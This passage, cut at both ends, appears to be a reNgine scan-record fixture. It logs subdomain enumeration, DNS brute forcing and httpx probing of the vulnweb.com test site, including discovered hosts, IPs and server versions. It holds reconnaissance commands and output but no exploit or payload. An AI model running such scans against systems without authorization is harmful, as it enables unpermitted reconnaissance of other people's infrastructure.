0.7 seconds found 0 subdomains\n02:05:19,776 [ALERT] utils:273 - GET https://rapiddns.io/subdomain/vulnweb.com?full=1 502 - Bad Gateway 6306\n02:05:19,778 [INFOR] module:63 - RapidDNSQuery module took 0.9 seconds found 0 subdomains\n02:05:19,962 [ALERT] utils:273 - GET https://transparencyreport.google.com/transparencyreport/api/v3/httpsreport/ct/certsearch?include_expired=true&include_subdomains=true&domain=vulnweb.com 404 - Not Found 1621\n02:05:19,964 [INFOR] module:63 - GoogleQuery module took 1.1 seconds found 0 subdomains\n02:05:20,038 [ALERT] utils:273 - GET https://searchdns.netcraft.com/?restriction=site+contains&position=limited&host=%2A.vulnweb.com&from=1 403 - Forbidden 9065\n02:05:20,039 [INFOR] module:63 - NetCraftQuery module took 1.1 seconds found 0 subdomains\n02:05:20,058 [INFOR] module:63 - MySSLQuery module took 1.2 seconds found 0 subdomains\n02:05:20,073 [INFOR] module:63 - AlienVaultQuery module took 1.1 seconds found 19 subdomains\n02:05:20,079 [ERROR] module:129 - HTTPConnectionPool(host='ww1.sublist3r.com', port=80): Max retries exceeded with url: /search.php?domain=vulnweb.com&usid=27&utid=9343009871 (Caused by NewConnectionError(': Failed to establish a new connection: [Errno 111] Connection refused'))\n02:05:20,079 [INFOR] module:63 - Sublist3rQuery module took 1.2 seconds found 0 subdomains\n02:05:20,300 [INFOR] module:63 - ChinazQuery module took 1.4 seconds found 2 subdomains\n02:05:20,395 [INFOR] module:63 - DNSDumpsterQuery module took 1.5 seconds found 11 subdomains\n02:05:20,446 [ALERT] utils:273 - POST https://www.dnsscan.cn/dns.html?keywords=vulnweb.com&page=1 404 - Not Found 206\n02:05:20,448 [INFOR] module:63 - QianXunQuery module took 1.5 seconds found 0 subdomains\n02:05:20,494 [INFOR] module:63 - AskSearch module took 1.2 seconds found 0 subdomains\n02:05:20,740 [ALERT] utils:273 - GET https://freeapi.robtex.com/pdns/reverse/176.28.50.165 503 - Service Unavailable 13\n02:05:20,930 [INFOR] module:63 - BingSearch module took 1.4 seconds found 0 subdomains\n02:05:21,538 [INFOR] module:63 - IP138Query module took 2.6 seconds found 16 subdomains\n02:05:21,667 [INFOR] module:63 - SogouSearch module took 2.1 seconds found 4 subdomains\n02:05:22,205 [INFOR] module:63 - GiteeSearch module took 2.7 seconds found 0 subdomains\n02:05:22,928 [INFOR] module:63 - YahooSearch module took 3.3 seconds found 0 subdomains\n02:05:22,994 [INFOR] module:63 - RobtexQuery module took 4.1 seconds found 12 subdomains\n02:05:23,169 [INFOR] module:63 - BaiduSearch module took 3.8 seconds found 0 subdomains\n02:05:23,409 [INFOR] module:63 - WzSearch module took 3.8 seconds found 0 subdomains\n02:05:23,624 [ERROR] module:129 - ('Connection broken: IncompleteRead(8064 bytes read, 128 more expected)', IncompleteRead(8064 bytes read, 128 more expected))\n02:05:23,625 [INFOR] module:63 - SoSearch module took 4.0 seconds found 0 subdomains\n02:05:25,465 [INFOR] module:63 - YandexSearch module took 5.9 seconds found 0 subdomains\n02:05:28,981 [INFOR] module:63 - CertInfo module took 10.1 seconds found 0 subdomains\n02:05:30,164 [ALERT] utils:273 - GET https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dsite%253A.vulnweb.com%2B-site%253Awww.vulnweb.com%26start%3D1%26num%3D50%26filter%3D0%26btnG%3DSearch%26gbv%3D1%26hl%3Den&hl=en&q=EgRdFhUyGOmS0LkGIjA4jCFSbA1f_Zqq8EGZ5bZ0xDEoq55nujRuL2fs30Jpp-cjQmBh1JBhzs0VExkTFEEyAXJaAUM 429 - Too Many Requests 3479\n02:05:30,166 [INFOR] module:63 - GoogleSearch module took 10.6 seconds found 5 subdomains\n02:05:32,528 [ERROR] module:129 - HTTPSConnectionPool(host='ce.baidu.com', port=443): Max retries exceeded with url: /index/getRelatedSites?site_address=vulnweb.com (Caused by ConnectTimeoutError(, 'Connection to ce.baidu.com timed out. (connect timeout=13)'))\n02:05:32,528 [INFOR] module:63 - CeBaiduQuery module took 13.6 seconds found 0 subdomains\n02:05:45,496 [INFOR] module:63 - CrossDomainCheck module took 26.6 seconds found 0 subdomains\n02:05:45,571 [INFOR] module:63 - SitemapCheck module took 26.7 seconds found 0 subdomains\n02:05:45,888 [INFOR] module:63 - RobotsCheck module took 27.0 seconds found 0 subdomains\n02:05:46,116 [INFOR] module:63 - BruteSRV module took 0.2 seconds found 0 subdomains\n02:05:46,148 [INFOR] brute:460 - Start running Brute module\n02:05:46,149 [INFOR] brute:410 - Blasting vulnweb.com\n02:05:46,149 [INFOR] utils:174 - /home/rengine/tools/.github/OneForAll/results/temp does not exist, directory will be created\n02:05:46,163 [INFOR] brute:119 - Querying NS records of vulnweb.com\n02:05:46,190 [INFOR] brute:129 - vulnweb.com's authoritative name server is ['ns1.eurodns.com.', 'ns2.eurodns.com.', 'ns3.eurodns.com.', 'ns4.eurodns.com.']\n02:05:46,191 [INFOR] brute:99 - Querying A record from authoritative name server: ['ns1.eurodns.com.', 'ns2.eurodns.com.', 'ns3.eurodns.com.', 'ns4.eurodns.com.']\n02:05:46,309 [INFOR] brute:114 - Authoritative name server A record result: ['199.167.66.107', '104.37.178.107', '199.167.66.108', '104.37.178.108']\n02:05:46,310 [INFOR] wildcard:159 - Collecting wildcard dns record for vulnweb.com\n02:05:46,311 [INFOR] wildcard:128 - Query c57e6bb7.vulnweb.com 's wildcard dns record in authoritative name server\n02:05:46,327 [INFOR] wildcard:153 - c57e6bb7.vulnweb.com results on authoritative name server: c57e6bb7.vulnweb.com. IP: {'44.228.249.3'} TTL: 3600\n02:05:46,327 [INFOR] wildcard:128 - Query 9620429e.vulnweb.com 's wildcard dns record in authoritative name server\n02:05:46,344 [INFOR] wildcard:153 - 9620429e.vulnweb.com results on authoritative name server: 9620429e.vulnweb.com. IP: {'44.228.249.3'} TTL: 3600\n02:05:46,353 [INFOR] brute:347 - Generating dictionary for vulnweb.com\n02:05:46,484 [ALERT] utils:695 - Please check whether tservw.vulnweb.com is correct or not\n02:05:46,488 [INFOR] brute:365 - Dictionary size: 95247\n02:05:46,554 [INFOR] brute:441 - Running massdns to brute subdomains\n02:05:53,114 [INFOR] brute:197 - Counting IP cname appear times\n02:05:53,606 [INFOR] brute:238 - Processing result\n02:05:55,294 [ALERT] brute:451 - Brute module takes 9.1 seconds, found 4 subdomains of vulnweb.com\n02:05:55,326 [INFOR] brute:489 - Finished Brute module to brute vulnweb.com\n02:05:55,412 [INFOR] resolve:143 - Start resolving subdomains of vulnweb.com\n02:05:55,428 [INFOR] resolve:166 - Running massdns to resolve subdomains\n02:05:56,460 [INFOR] resolve:104 - Processing resolved results\n02:05:56,461 [INFOR] resolve:172 - Finished resolve subdomains of vulnweb.com\n02:05:56,461 [INFOR] resolve:61 - Saving resolved results\n02:05:56,555 [INFOR] request:258 - Start requesting subdomains of vulnweb.com\n02:05:56,555 [INFOR] request:39 - Port range:[80, 443]\n02:05:56,555 [INFOR] request:56 - Generating request urls\n\n0it [00:00, ?it/s]02:05:56,556 [INFOR] request:217 - Requesting urls in bulk\n\nRequest Progress: 37%|████████▌ | 38/102 [00:00<00:00, 379.99it/s]\nRequest Progress: 78%|██████████████████ | 80/102 [00:00<00:00, 248.78it/s]\nRequest Progress: 103it [00:17, 5.90it/s]\n02:06:14,024 [INFOR] request:264 - Found that vulnweb.com has 7 alive subdomains\n02:06:14,024 [INFOR] finder:23 - Start Finder module\n\n0it [00:00, ?it/s]02:06:14,076 [INFOR] request:217 - Requesting urls in bulk\n\nRequest Progress: 6it [00:00, 14.06it/s]\n02:06:14,507 [INFOR] module:63 - Finder module took 0.5 seconds found 0 subdomains\n02:06:14,508 [INFOR] module:63 - Finder module took 0.5 seconds found 0 subdomains\n02:06:14,508 [INFOR] resolve:143 - Start resolving subdomains of vulnweb.com\n\n0it [00:00, ?it/s]02:06:14,508 [INFOR] request:258 - Start requesting subdomains of vulnweb.com\n02:06:14,509 [INFOR] request:39 - Port range:[80, 443]\n02:06:14,509 [INFOR] request:56 - Generating request urls\n02:06:14,509 [INFOR] request:217 - Requesting urls in bulk\n\nRequest Progress: 1it [00:00, 204.79it/s]\n02:06:14,517 [INFOR] request:264 - Found that vulnweb.com has 7 alive subdomains\n02:06:14,517 [INFOR] altdns:203 - Start altdns module\n02:06:14,772 [INFOR] altdns:210 - The altdns module generated 60 new subdomains\n02:06:14,772 [INFOR] resolve:143 - Start resolving subdomains of vulnweb.com\n02:06:14,816 [INFOR] resolve:166 - Running massdns to resolve subdomains\n02:06:17,656 [INFOR] resolve:104 - Processing resolved results\n02:06:17,658 [INFOR] resolve:172 - Finished resolve subdomains of vulnweb.com\n02:06:17,667 [INFOR] request:258 - Start requesting subdomains of vulnweb.com\n\n0it [00:00, ?it/s]02:06:17,668 [INFOR] request:39 - Port range:[80, 443]\n02:06:17,668 [INFOR] request:56 - Generating request urls\n02:06:17,668 [INFOR] request:217 - Requesting urls in bulk\n\nRequest Progress: 28%|██████▌ | 34/120 [00:00<00:00, 336.63it/s]\nRequest Progress: 57%|█████████████▏ | 69/120 [00:00<00:00, 144.13it/s]\nRequest Progress: 121it [00:17, 6.83it/s]\n02:06:35,379 [INFOR] request:264 - Found that vulnweb.com has 7 alive subdomains\n02:06:42,422 [ALERT] export:66 - The subdomain result for vulnweb.com: /home/rengine/tools/.github/OneForAll/results/vulnweb.com.csv\n02:06:42,425 [INFOR] oneforall:255 - Finished OneForAll", + "time": "2024-11-13T02:05:14.244Z" + } +}, +{ + "model": "startScan.command", + "pk": 30, + "fields": { + "scan_history": 1, + "activity": 1, + "command": "netlas search -d domain -i domain domain:\"*.vulnweb.com\" -f json | grep -oE '([a-zA-Z0-9]([-a-zA-Z0-9]*[a-zA-Z0-9])?\\.)+vulnweb.com' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/subdomains_netlas.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:06:42.714Z" + } +}, +{ + "model": "startScan.command", + "pk": 31, + "fields": { + "scan_history": 1, + "activity": 1, + "command": "cat /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/subdomains_*.txt > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/#1_subdomain_discovery.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:06:43.938Z" + } +}, +{ + "model": "startScan.command", + "pk": 32, + "fields": { + "scan_history": 1, + "activity": 1, + "command": "sort -u /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/#1_subdomain_discovery.txt -o /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/#1_subdomain_discovery.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:06:43.964Z" + } +}, +{ + "model": "startScan.command", + "pk": 33, + "fields": { + "scan_history": 1, + "activity": 3, + "command": "httpx -cl -ct -rt -location -td -websocket -cname -asn -cdn -probe -random-agent -t 30 -json -l /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/httpx_input.txt -silent", + "return_code": 0, + "output": "{\"timestamp\":\"2024-11-13T02:06:58.96885088Z\",\"url\":\"http://2fwww.vulnweb.com\",\"input\":\"2fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:06:58.96893286Z\",\"url\":\"http://2burl-3dhttp-3a-2f-2fwww.vulnweb.com\",\"input\":\"2burl-3dhttp-3a-2f-2fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:06:58.973973343Z\",\"url\":\"http://4burl-3dhttp-3a-2f-2fwww.vulnweb.com\",\"input\":\"4burl-3dhttp-3a-2f-2fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:06:58.97397883Z\",\"url\":\"http://5burl-3dhttp-3a-5f-5fwww.vulnweb.com\",\"input\":\"5burl-3dhttp-3a-5f-5fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:06:58.974025666Z\",\"url\":\"http://3burl-3dhttp-3a-2f-2fwww.vulnweb.com\",\"input\":\"3burl-3dhttp-3a-2f-2fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:06:58.974519546Z\",\"url\":\"http://2f-2fwww.vulnweb.com\",\"input\":\"2f-2fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:06:58.974580052Z\",\"url\":\"http://5burl-1dhttp-1a-2f-2fwww.vulnweb.com\",\"input\":\"5burl-1dhttp-1a-2f-2fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:06:58.976458698Z\",\"url\":\"http://5burl-3dhttp-3a-2f-2fwww.vulnweb.com\",\"input\":\"5burl-3dhttp-3a-2f-2fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:06:58.976726602Z\",\"url\":\"http://4fwww.vulnweb.com\",\"input\":\"4fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:06:58.976895394Z\",\"url\":\"http://5burl-3dhttp-3a-4f-4fwww.vulnweb.com\",\"input\":\"5burl-3dhttp-3a-4f-4fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:06:58.977078696Z\",\"url\":\"http://3fwww.vulnweb.com\",\"input\":\"3fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:06:58.981988541Z\",\"url\":\"http://0fwww.vulnweb.com\",\"input\":\"0fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:06:58.982022747Z\",\"url\":\"http://4ftestasp.vulnweb.com\",\"input\":\"4ftestasp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:06:58.982207516Z\",\"url\":\"http://1f-1fwww.vulnweb.com\",\"input\":\"1f-1fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:06:58.983600114Z\",\"url\":\"http://0f-0fwww.vulnweb.com\",\"input\":\"0f-0fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:06:58.983881685Z\",\"url\":\"http://4ctestasp.vulnweb.com\",\"input\":\"4ctestasp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:06:58.984080849Z\",\"url\":\"http://5burl-0dhttp-0a-2f-2fwww.vulnweb.com\",\"input\":\"5burl-0dhttp-0a-2f-2fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:06:58.984243196Z\",\"url\":\"http://3f-3fwww.vulnweb.com\",\"input\":\"3f-3fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:06:58.984451263Z\",\"url\":\"http://5burl-3dhttp-3a-3f-3fwww.vulnweb.com\",\"input\":\"5burl-3dhttp-3a-3f-3fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:06:58.985793651Z\",\"url\":\"http://10ctestasp.vulnweb.com\",\"input\":\"10ctestasp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:06:59.003644825Z\",\"url\":\"http://2ftestasp.vulnweb.com\",\"input\":\"2ftestasp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:06:59.007757804Z\",\"url\":\"http://3ftestasp.vulnweb.com\",\"input\":\"3ftestasp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:06:59.007942852Z\",\"url\":\"http://5burl-3dhttp-3a-0f-0fwww.vulnweb.com\",\"input\":\"5burl-3dhttp-3a-0f-0fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:06:59.009414358Z\",\"url\":\"http://5burl-4dhttp-4a-2f-2fwww.vulnweb.com\",\"input\":\"5burl-4dhttp-4a-2f-2fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:06:59.009664703Z\",\"url\":\"http://1fwww.vulnweb.com\",\"input\":\"1fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:06:59.011553533Z\",\"url\":\"http://4f-4fwww.vulnweb.com\",\"input\":\"4f-4fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:06:59.011705512Z\",\"url\":\"http://5burl-2dhttp-2a-2f-2fwww.vulnweb.com\",\"input\":\"5burl-2dhttp-2a-2f-2fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:06:59.012257667Z\",\"url\":\"http://5burl-3dhttp-3a-1f-1fwww.vulnweb.com\",\"input\":\"5burl-3dhttp-3a-1f-1fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:06:59.014588195Z\",\"url\":\"http://1ftestasp.vulnweb.com\",\"input\":\"1ftestasp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:06:59.022774674Z\",\"url\":\"http://0ftestasp.vulnweb.com\",\"input\":\"0ftestasp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.310359297Z\",\"url\":\"http://5burl-6dhttp-6a-2f-2fwww.vulnweb.com\",\"input\":\"5burl-6dhttp-6a-2f-2fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.318189109Z\",\"url\":\"http://5burl-5dhttp-5a-2f-2fwww.vulnweb.com\",\"input\":\"5burl-5dhttp-5a-2f-2fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.321624832Z\",\"url\":\"http://6ctestasp.vulnweb.com\",\"input\":\"6ctestasp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.323399578Z\",\"url\":\"http://5fwww.vulnweb.com\",\"input\":\"5fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.325514173Z\",\"url\":\"http://5f-5fwww.vulnweb.com\",\"input\":\"5f-5fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.32665911Z\",\"url\":\"http://5ctestasp.vulnweb.com\",\"input\":\"5ctestasp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.326917397Z\",\"url\":\"http://antivirus0.vulnweb.com\",\"input\":\"antivirus0.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.328048223Z\",\"url\":\"http://9ctestasp.vulnweb.com\",\"input\":\"9ctestasp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.328163586Z\",\"url\":\"http://5ftestasp.vulnweb.com\",\"input\":\"5ftestasp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.329700472Z\",\"url\":\"http://7burl-3dhttp-3a-2f-2fwww.vulnweb.com\",\"input\":\"7burl-3dhttp-3a-2f-2fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.330421901Z\",\"url\":\"http://8burl-3dhttp-3a-2f-2fwww.vulnweb.com\",\"input\":\"8burl-3dhttp-3a-2f-2fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.330482039Z\",\"url\":\"http://6burl-3dhttp-3a-2f-2fwww.vulnweb.com\",\"input\":\"6burl-3dhttp-3a-2f-2fwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.331938076Z\",\"url\":\"http://antivirus1.vulnweb.com\",\"input\":\"antivirus1.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.332621182Z\",\"url\":\"http://antivirus2.vulnweb.com\",\"input\":\"antivirus2.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.333612254Z\",\"url\":\"http://7ctestasp.vulnweb.com\",\"input\":\"7ctestasp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.334819008Z\",\"url\":\"http://antivirus3.vulnweb.com\",\"input\":\"antivirus3.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.336693367Z\",\"url\":\"http://app.vulnweb.com\",\"input\":\"app.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.337063135Z\",\"url\":\"http://8ctestasp.vulnweb.com\",\"input\":\"8ctestasp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.34052685Z\",\"url\":\"http://arabatik.vulnweb.com\",\"input\":\"arabatik.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.342701138Z\",\"url\":\"http://antivirus4.vulnweb.com\",\"input\":\"antivirus4.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.347640745Z\",\"url\":\"http://aspnet.vulnweb.com\",\"input\":\"aspnet.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.358553135Z\",\"url\":\"http://estphp.vulnweb.com\",\"input\":\"estphp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.358770118Z\",\"url\":\"http://edu-rost.ruwww.vulnweb.com\",\"input\":\"edu-rost.ruwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.361674526Z\",\"url\":\"http://edu-rost.rutestasp.vulnweb.com\",\"input\":\"edu-rost.rutestasp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.361833947Z\",\"url\":\"http://gd.vulnweb.com\",\"input\":\"gd.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.362165863Z\",\"url\":\"http://httestphp.vulnweb.com\",\"input\":\"httestphp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.362207283Z\",\"url\":\"http://blogger.com.vulnweb.com\",\"input\":\"blogger.com.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.365988604Z\",\"url\":\"http://localhost.vulnweb.com\",\"input\":\"localhost.vulnweb.com\",\"error\":\"connection refused\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.366500537Z\",\"url\":\"http://htestphp.vulnweb.com\",\"input\":\"htestphp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.372372848Z\",\"url\":\"http://httptestphp.vulnweb.com\",\"input\":\"httptestphp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:09.376889233Z\",\"url\":\"http://httptestaspnet.vulnweb.com\",\"input\":\"httptestaspnet.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:19.539856266Z\",\"port\":\"80\",\"url\":\"http://rest.vulnweb.com\",\"input\":\"rest.vulnweb.com\",\"title\":\"Invicti Vulnerable REST API\",\"scheme\":\"http\",\"webserver\":\"Apache/2.4.25 (Debian)\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"18.215.71.186\",\"path\":\"/\",\"time\":\"199.289656ms\",\"a\":[\"18.215.71.186\"],\"tech\":[\"Apache HTTP Server:2.4.25\",\"Debian\",\"PHP:7.1.26\"],\"words\":1398,\"lines\":138,\"status_code\":200,\"content_length\":3556,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:07:19.666539764Z\",\"url\":\"http://nmaptestphp.vulnweb.com\",\"input\":\"nmaptestphp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:19.668579784Z\",\"url\":\"http://htttestphp.vulnweb.com\",\"input\":\"htttestphp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:19.673713729Z\",\"url\":\"http://phptest.vulnweb.com\",\"input\":\"phptest.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:19.674408104Z\",\"url\":\"http://testaps.vulnweb.com\",\"input\":\"testaps.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:19.675401611Z\",\"url\":\"http://testap.vulnweb.com\",\"input\":\"testap.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:19.676910683Z\",\"url\":\"http://test.php.vulnweb.com\",\"input\":\"test.php.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:19.678049908Z\",\"url\":\"http://odincovo.vulnweb.com\",\"input\":\"odincovo.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:19.679507998Z\",\"url\":\"http://pingwww.vulnweb.com\",\"input\":\"pingwww.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:19.680977998Z\",\"url\":\"http://restasp.vulnweb.com\",\"input\":\"restasp.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:19.681460666Z\",\"url\":\"http://testhtml3.vulnweb.com\",\"input\":\"testhtml3.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:19.684463332Z\",\"url\":\"http://testapsnet.vulnweb.com\",\"input\":\"testapsnet.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:19.684897653Z\",\"url\":\"http://test.vulnweb.com\",\"input\":\"test.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:19.685918493Z\",\"url\":\"http://testhtml2.vulnweb.com\",\"input\":\"testhtml2.vulnweb.com\",\"error\":\"EOF\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:07:19.6863751